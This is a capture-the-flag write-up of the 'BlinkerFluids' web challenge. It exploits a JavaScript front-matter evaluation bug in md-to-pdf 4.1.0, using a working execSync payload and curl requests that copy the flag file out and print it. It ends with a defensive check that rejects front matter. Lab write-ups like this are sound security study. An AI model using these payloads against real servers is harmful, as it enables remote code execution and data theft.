BlinkerFluids
We have a website where we can write Markdown and transform the document to PDF:
By default, we have this Markdown content:
As this is a Node.js project, reading package.json shows the versions of the third-party dependencies:
{
  "name": "blinker-fluids",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "start": "node index.js"
  },
  "keywords": [],
  "author": "rayhan0x01",
  "license": "ISC",
  "dependencies": {
    "express": "4.17.3",
    "md-to-pdf": "4.1.0",
    "nunjucks": "3.2.3",
    "sqlite-async": "1.1.3",
    "uuid": "8.3.2"
  },
  "devDependencies": {
    "nodemon": "^1.19.1"
  }
}
We notice that md-to-pdf version 4.1.0 has a critical vulnerability (snyk.io): JavaScript placed in the document's front matter is evaluated during conversion. We only need to use this payload:
---js\n((require("child_process")).execSync("id > /tmp/RCE.txt"))\n---RCE
So we use it to copy the file flag.txt to the static/images directory:
And we transform it to PDF:
However, it still does not work, so we delete the invoice and try again using curl:
$ curl 206.189.25.173:31956/api/invoice/add -d '{"markdown_content":"---js\n((require(\"child_process\")).execSync(\"cat /flag.txt > /app/static/images/flag.txt\"))\n---RCE"}' -H 'Content-Type: application/json'
{"message":"Invoice saved successfully!"}
$ curl 206.189.25.173:31956/api/invoice/list -s | jq
[
  {
    "id": 7,
    "invoice_id": "5b364083-a15a-41d6-a9b3-6f8e20af96aa",
    "created": "2022-06-30 14:50:39"
  },
  {
    "id": 1,
    "invoice_id": "f0daa85f-b9de-4b78-beff-2f86e242d6ac",
    "created": "2022-06-30 13:07:16"
  }
]
And now it worked:
$ curl 206.189.25.173:31956/static/images/flag.txt
HTB{int3rG4l4c7iC_r1d3_0n_bl1nk3r_flu1d5}
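From the defender's side, the payload works because md-to-pdf 4.1.0 hands the document's front matter to gray-matter, whose js engine evaluates a block tagged `---js` as code instead of parsing it as data. Besides upgrading the dependency, an application that only ever needs plain Markdown (an invoice body) can refuse any document that opens with a front-matter block. The following is an added example, not code from the challenge or from md-to-pdf; the function names and the sample inputs are chosen here.

```javascript
// Added example: detect front-matter blocks before Markdown reaches a converter
// such as md-to-pdf. Front matter opens with '---' on the first line and may
// carry an engine tag right after the dashes (e.g. '---js'); gray-matter picks
// the engine from that tag, so the tag is the signal that the block would be
// evaluated rather than parsed. Names below are chosen for this example and
// are not part of md-to-pdf or the challenge code.

// Opening delimiter at the very start of the document (optional BOM),
// followed by an optional engine tag and the end of that line.
const OPENING_RE = /^\uFEFF?---([^\r\n]*)(?:\r?\n|$)/;

// Returns { hasFrontMatter, engine }: engine is 'yaml' for a bare '---'
// (gray-matter's default) or the lower-cased tag that followed the dashes.
function inspectFrontMatter(markdown) {
  const m = OPENING_RE.exec(String(markdown));
  if (m === null) {
    return { hasFrontMatter: false, engine: null };
  }
  const tag = m[1].trim();
  return { hasFrontMatter: true, engine: tag === '' ? 'yaml' : tag.toLowerCase() };
}

// Invoice text never needs front matter, so any leading '---' block is
// rejected; the engine name is kept so the refusal can be logged with a reason.
function isSafeForRendering(markdown) {
  const info = inspectFrontMatter(markdown);
  if (!info.hasFrontMatter) {
    return { ok: true, reason: null };
  }
  return { ok: false, reason: `front matter with engine "${info.engine}" is not allowed` };
}

// Constructed inputs: a plain invoice, YAML front matter, and a harmless
// JavaScript block of the same shape as the one used in the write-up.
const PLAIN = '# Invoice\n\nThanks for your purchase.\n';
const YAML_FM = '---\ntitle: Invoice\n---\n# Invoice\n';
const JS_FM = '---js\nmodule.exports = { title: "Invoice" };\n---\n# Invoice\n';

for (const doc of [PLAIN, YAML_FM, JS_FM]) {
  const verdict = isSafeForRendering(doc);
  console.log(verdict.ok ? 'render' : `reject: ${verdict.reason}`);
}
```

Running the block prints `render` for the plain invoice and `reject: ...` for both front-matter documents; the closing delimiter is irrelevant to the check, so a block ending in `---RCE` as in the write-up is caught the same way.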